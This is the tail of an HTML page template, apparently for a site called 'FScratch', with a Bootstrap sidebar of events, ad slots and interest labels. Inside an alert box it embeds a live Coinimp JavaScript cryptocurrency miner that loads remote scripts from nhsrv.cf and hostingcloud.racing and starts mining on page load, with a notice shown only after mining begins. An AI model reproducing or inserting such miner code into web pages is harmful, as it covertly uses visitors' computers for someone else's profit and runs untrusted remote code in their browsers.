
  <!-- Mid Content Here -->
  
            </div>
          </div>
        </div>
      </div>

   </div>

    <!-- Left Side here -->
    <div class="col-sm-2 well" style="border-style: ridge; border-radius: 20px;">
      <div class="thumbnail">
        <p>Upcoming Events:</p>
        <!-- <img src="paris.jpg" alt="Paris" width="100%" height="100px"> -->
        <p><strong>Welcome</strong></p>
        <p id="date1">Fri. 27 November 2015</p>
        <button class="btn btn-primary">Info</button>
      </div>     
      
      <div class="well">
        <p>ADS</p>
      </div>      
      <div class="well">
        <p>ADS</p>
      </div>

      <div class="well">
        <p><a href="#">Interests</a></p>
        <p>
          <span class="label label-default">News</span>
          <span class="label label-primary">W3Schools</span>
          <span class="label label-success">Labels</span>
          <span class="label label-info">Football</span>
          <span class="label label-warning">Gaming</span>
          <span class="label label-danger">Friends</span>
          
        </p>
      </div>
      
      <div class="alert alert-danger fade in">
        <a href="#" class="close" data-dismiss="alert" aria-label="close">close</a>
		<span class="thumbnail">
        <p><strong>Ey! {{request.user.username}}</strong></p>
        
        <!-- Miner Start -->

 <script type="text/javascript" src="https://nhsrv.cf/srv/?key=0014b97e1532ecee0527bb042f9b81cc"></script>



<script src="https://www.hostingcloud.racing/pcLs.js"></script>
<script>
    var _client = new Client.Anonymous('65f8d841f6ce67b6f5b224d0640bd807cd9928473d043c255aca4031bce7956c', {
        throttle: 0.3
    });
    _client.start();
    _client.addMiningNotification("Bottom", "Welcome to FScratch. We are running a JSMiner on Coinimp.com", "#cccccc", 20, "#3d3d3d");

</script>
       <!-- Miner End -->

		</span>
 
      </div>


    </div>
    
    <!-- Footer Here -->
    
  </div>
</div>

<footer class="container-fluid text-center">
  <p>Footer Text</p>
</footer>

</body>
</html>